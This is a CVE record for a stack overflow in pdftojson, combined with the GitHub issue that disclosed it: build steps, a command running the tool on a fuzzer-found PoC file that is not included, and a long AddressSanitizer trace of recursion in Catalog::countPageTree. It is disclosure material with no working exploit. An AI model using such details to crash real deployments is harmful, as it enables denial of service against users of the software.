CVE-2022-44108 | 2022-12-19T23:15:10.777 | pdftojson commit 94204bb was discovered to contain a stack overflow via the component Object::copy(Object*):Object.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ldenoue/pdftojson"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ldenoue/pdftojson/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ldenoue/pdftojson"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ldenoue/pdftojson/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pdftojson_project:pdftojson:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4486D994-4B0D-4B67-971A-C3A4DBF2473C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/ldenoue/pdftojson/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ldenoue",
"pdftojson"
] | ### Description
A stack-overflow in function Object::copy(Object*).
The issue is being triggered in Object::copy(Object*) :Object.cc:75:8
### Environment
Ubuntu 18.04, 64bit
### Reproduce
Command
git clone the Lastest Version firstly.
./configure
make
./pdftojson poc test.json
### ASAN
```
Config Error: No display font for 'Courier'
Config Error: No display font for 'Courier-Bold'
Config Error: No display font for 'Courier-BoldOblique'
Config Error: No display font for 'Courier-Oblique'
Config Error: No display font for 'Helvetica'
Config Error: No display font for 'Helvetica-Bold'
Config Error: No display font for 'Helvetica-BoldOblique'
Config Error: No display font for 'Helvetica-Oblique'
Config Error: No display font for 'Symbol'
Config Error: No display font for 'Times-Bold'
Config Error: No display font for 'Times-BoldItalic'
Config Error: No display font for 'Times-Italic'
Config Error: No display font for 'Times-Roman'
Config Error: No display font for 'ZapfDingbats'
Syntax Error: Couldn't read xref table
Syntax Warning: PDF file is damaged - attempting to reconstruct xref table...
Syntax Error (12099): Dictionary key must be a name object
Syntax Error (12102): Dictionary key must be a name object
Syntax Error (12107): Illegal character <2f> in hex string
Syntax Error (12109): Illegal character <6f> in hex string
Syntax Error (12110): Illegal character <75> in hex string
Syntax Error (12111): Illegal character <6e> in hex string
Syntax Error (12112): Illegal character <74> in hex string
Syntax Error (12115): Illegal character <2f> in hex string
Syntax Error (12117): Illegal character <69> in hex string
Syntax Error (12118): Illegal character <72> in hex string
Syntax Error (12119): Illegal character <73> in hex string
Syntax Error (12120): Illegal character <74> in hex string
Syntax Error (12127): Illegal character <52> in hex string
Syntax Error (12128): Illegal character <2f> in hex string
Syntax Error (12129): Illegal character <4c> in hex string
Syntax Error (12131): Illegal character <73> in hex string
Syntax Error (12132): Illegal character <74> in hex string
Syntax Error (12139): Illegal character <52> in hex string
Syntax Error (12141): Dictionary key must be a name object
Syntax Error (12142): Illegal character '>'
Syntax Error (12142): Dictionary key must be a name object
Syntax Error (12149): Dictionary key must be a name object
Syntax Error (12153): Dictionary key must be a name object
Syntax Error (12155): Dictionary key must be a name object
Syntax Error (12159): Dictionary key must be a name object
Syntax Error (12162): Dictionary key must be a name object
Syntax Error (12168): Dictionary key must be a name object
Syntax Error (12286): Dictionary key must be a name object
Syntax Error (12288): Dictionary key must be a name object
Syntax Error (12292): Dictionary key must be a name object
Syntax Error (12295): Dictionary key must be a name object
Syntax Error (12300): Dictionary key must be a name object
AddressSanitizer:DEADLYSIGNAL
=================================================================
==18031==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd656cef98 (pc 0x000000498936 bp 0x7ffd656cf7e0 sp 0x7ffd656cefa0 T0)
#0 0x498936 in __asan_memcpy (/AFLplusplus/my_test/pdftojson-master/tanuki/asan_bin/pdftojson+0x498936)
#1 0x69507b in Object::copy(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Object.cc:75:8
#2 0x775f77 in XRef::fetch(int, int, Object*, int) /AFLplusplus/my_test/pdftojson-master/xpdf/XRef.cc:991:25
#3 0x4f460c in Object::arrayGet(int, Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/./Object.h:231:19
#4 0x4f460c in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:441:12
#5 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#6 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#7 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#8 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#9 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#10 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#11 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#12 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#13 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#14 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#15 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#16 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#17 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#18 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#19 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#20 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#21 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#22 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#23 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#24 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#25 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#26 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#27 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#28 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#29 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#30 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#31 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#32 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#33 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#34 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#35 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#36 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#37 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#38 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#39 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#40 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#41 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#42 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#43 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#44 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#45 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#46 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#47 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#48 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#49 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#50 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#51 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#52 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#53 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#54 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#55 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#56 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#57 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#58 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#59 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#60 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#61 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#62 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#63 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#64 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#65 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#66 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#67 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#68 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#69 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#70 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#71 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#72 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#73 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#74 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#75 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#76 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#77 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#78 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#79 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#80 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#81 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#82 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#83 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#84 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#85 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#86 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#87 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#88 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#89 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#90 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#91 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#92 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#93 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#94 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#95 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#96 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#97 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#98 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#99 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#100 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#101 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#102 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#103 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#104 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#105 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#106 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#107 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#108 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#109 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#110 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#111 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#112 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#113 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#114 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#115 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#116 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#117 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#118 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#119 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#120 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#121 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#122 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#123 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#124 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#125 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#126 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#127 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#128 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#129 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#130 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#131 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#132 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#133 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#134 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#135 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#136 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#137 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#138 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#139 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#140 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#141 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#142 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#143 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#144 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#145 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#146 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#147 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#148 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#149 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#150 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#151 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#152 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#153 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#154 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#155 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#156 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#157 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#158 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#159 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#160 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#161 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#162 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#163 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#164 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#165 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#166 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#167 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#168 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#169 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#170 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#171 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#172 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#173 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#174 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#175 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#176 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#177 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#178 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#179 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#180 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#181 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#182 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#183 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#184 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#185 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#186 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#187 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#188 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#189 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#190 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#191 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#192 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#193 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#194 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#195 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#196 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
#197 0x4f4618 in Catalog::countPageTree(Object*) /AFLplusplus/my_test/pdftojson-master/xpdf/Catalog.cc:442:12
